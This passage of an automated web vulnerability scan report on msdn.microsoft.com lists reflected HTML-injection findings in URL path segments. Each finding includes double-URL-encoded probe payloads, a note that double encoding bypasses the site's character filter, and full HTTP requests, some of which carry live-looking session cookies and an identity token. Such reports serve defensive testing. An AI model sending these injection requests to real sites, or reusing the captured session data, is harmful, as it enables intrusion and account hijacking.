Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us61c4c"><a>ee87a223ebb/library/cc295789" />
...[SNIP]...

2.38. http://msdn.microsoft.com/en-us/library/cc295789.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/cc295789.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44a01%2522%253e%253ca%253ede0d876fda0 was submitted in the REST URL parameter 2. This input was echoed as 44a01"><a>de0d876fda0 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library44a01%2522%253e%253ca%253ede0d876fda0/cc295789.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library44a01"><a>de0d876fda0/cc295789" />
...[SNIP]...

2.39. http://msdn.microsoft.com/en-us/library/cc295789.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/cc295789.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e327%2522%253e%253ca%253e398a6fe2bd2 was submitted in the REST URL parameter 3. This input was echoed as 9e327"><a>398a6fe2bd2 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/cc295789.aspx9e327%2522%253e%253ca%253e398a6fe2bd2 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/cc295789.aspx9e327"><a>398a6fe2bd2" />
...[SNIP]...

2.40. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd208104(PROT.10

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56fbf%2522%253e%253ca%253e18d7c0c0b34 was submitted in the REST URL parameter 1. This input was echoed as 56fbf"><a>18d7c0c0b34 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us56fbf%2522%253e%253ca%253e18d7c0c0b34/library/dd208104(PROT.10 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us56fbf"><a>18d7c0c0b34/library/dd208104(PROT.10" />
...[SNIP]...

2.41. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd208104(PROT.10

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a45d7%2522%253e%253ca%253e649622910d4 was submitted in the REST URL parameter 2. This input was echoed as a45d7"><a>649622910d4 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/librarya45d7%2522%253e%253ca%253e649622910d4/dd208104(PROT.10 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9216
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya45d7"><a>649622910d4/dd208104(PROT.10" />
...[SNIP]...

2.42. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd208104(PROT.10

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 797d1%2522%253e%253ca%253e5235629b1dd was submitted in the REST URL parameter 3. This input was echoed as 797d1"><a>5235629b1dd in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd208104(PROT.10797d1%2522%253e%253ca%253e5235629b1dd HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9215
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd208104(PROT.10797d1"><a>5235629b1dd" />
...[SNIP]...

2.43. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10).aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd208104(PROT.10).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e862a%2522%253e%253ca%253e3fcd2f23dad was submitted in the REST URL parameter 1. This input was echoed as e862a"><a>3fcd2f23dad in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-use862a%2522%253e%253ca%253e3fcd2f23dad/library/dd208104(PROT.10).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9217
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-use862a"><a>3fcd2f23dad/library/dd208104(PROT.10)" />
...[SNIP]...

2.44. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10).aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd208104(PROT.10).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 653a0%2522%253e%253ca%253eb3def3ef286 was submitted in the REST URL parameter 2. This input was echoed as 653a0"><a>b3def3ef286 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library653a0%2522%253e%253ca%253eb3def3ef286/dd208104(PROT.10).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9217
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:37 GMT

